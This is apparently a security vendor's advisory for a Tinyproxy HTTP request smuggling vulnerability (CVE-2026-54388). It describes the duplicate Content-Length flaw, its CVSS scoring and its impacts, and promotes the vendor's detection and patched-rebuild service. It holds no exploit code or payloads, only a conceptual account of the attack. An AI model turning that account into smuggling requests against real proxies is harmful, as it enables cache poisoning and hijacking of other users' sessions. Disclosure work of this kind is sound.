CVE-2026-54388: Tinyproxy - HTTP Request Smuggling via Duplicate Content-Length Headers
Tinyproxy through 1.11.3, fixed in commit 364cdb6, fails to reject requests containing multiple Content-Length headers with differing values, forwarding all duplicate headers to the backend while using the first value to determine how many request body bytes to consume. Remote attackers can desynchronize the proxy and backend parser state, allowing injection of arbitrary HTTP requests to the backend to enable cache poisoning, access control bypass, and request hijacking.
Metrics
- CVSS v4.0
- 9.3
- Severity
- CRITICAL
- Fixed in
- 364cdb67e0ea00a8e4a7037e2693e0711e816adb
- Affected Products
- 1
HarborGuard Analysis
Synopsis
HTTP request smuggling in Tinyproxy allows a remote, unauthenticated attacker to desynchronize the proxy and backend HTTP parser state by sending requests with multiple conflicting Content-Length headers. The vulnerability is reachable over the network with no authentication required. Successful exploitation enables cache poisoning, access control bypass, and arbitrary HTTP request injection to the backend server. A patched-image rebuild at commit 364cdb67e0ea00a8e4a7037e2693e0711e816adb is available on HarborGuard for environments running an affected version.
HarborGuard Coverage
Detection of CVE-2026-54388 is available across every HarborGuard environment, with the CVE matched against customer images (including custom-built images) within minutes of ingestion from upstream advisory feeds. Any image carrying Tinyproxy at version 1.11.3 or earlier is flagged automatically in both registry scans and CI/CD pipeline checks.
AvailableTriage is available with the full CVSS v4.0 score of 9.3 (Critical) applied to each matched image, weighted further by any per-environment compliance policy the customer has configured. Findings are routed to the team inbox or ticketing integration designated in each customer organization's routing rules.
AvailableA patched-image rebuild pinned to commit 364cdb67e0ea00a8e4a7037e2693e0711e816adb becomes available on HarborGuard for any environment where an affected image is detected. For customers who opt into auto-remediation, HarborGuard triggers the rebuild, runs a regression test suite against the new image, and opens a pull request against affected workloads automatically.
AvailableExploit Conditions
- Network reachabilityRequired
The attacker must reach the Tinyproxy service over the network; the vulnerability is exposed to any client that can send HTTP requests to the proxy (AV:N).
- AuthenticationNot required
No credentials or session are needed; the malicious request can be sent by any unauthenticated HTTP client (PR:N).
- Victim interactionNot required
Exploitation is fully attacker-driven and requires no action from a legitimate user or administrator (UI:N).
- Attack complexityDetail
The exploit is reliable and condition-free; no race conditions or special environmental state are required to trigger the header smuggling (AC:L, AT:N).
Blast Radius
- An attacker reads responses intended for other users by hijacking in-flight backend requests, exposing session tokens or sensitive application data (VC:H).
- An attacker injects arbitrary HTTP requests to the backend, modifying persisted application state or poisoning shared caches to serve malicious content to subsequent users (VI:H).
- Access control rules enforced by Tinyproxy or the backend can be bypassed entirely, reaching endpoints or resources that should be restricted to privileged users.
- Cache poisoning allows the attacker to plant crafted responses that are served to any user whose request hits the poisoned cache entry, amplifying impact beyond the initial exploit.
How HarborGuard Handles This
Available on HarborGuard: images containing Tinyproxy at or below version 1.11.3 are matched against CVE-2026-54388 within minutes of advisory publication, including images built internally by customers. Where compliance policy permits, a rebuild against commit 364cdb67e0ea00a8e4a7037e2693e0711e816adb is queued immediately. For customers with auto-remediation enabled, HarborGuard produces the rebuilt image, runs a regression test pass, and opens a pull request against affected workloads; for Critical-severity findings the median time from CVE publication to merged patch PR is around 90 minutes in environments with auto-remediation active. For customers who manage patching manually, the HarborGuard finding card links directly to the fix commit and marks the image as blocked from promotion until the fix version is present. Given the unauthenticated, network-reachable nature of this vulnerability, teams that cannot immediately rebuild are advised to use HarborGuard network-policy isolation controls to restrict inbound access to the Tinyproxy port to trusted source ranges while the patch is applied.
- tinyproxy / tinyproxy≤ 1.11.3Fixed in 364cdb67e0ea00a8e4a7037e2693e0711e816adb
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N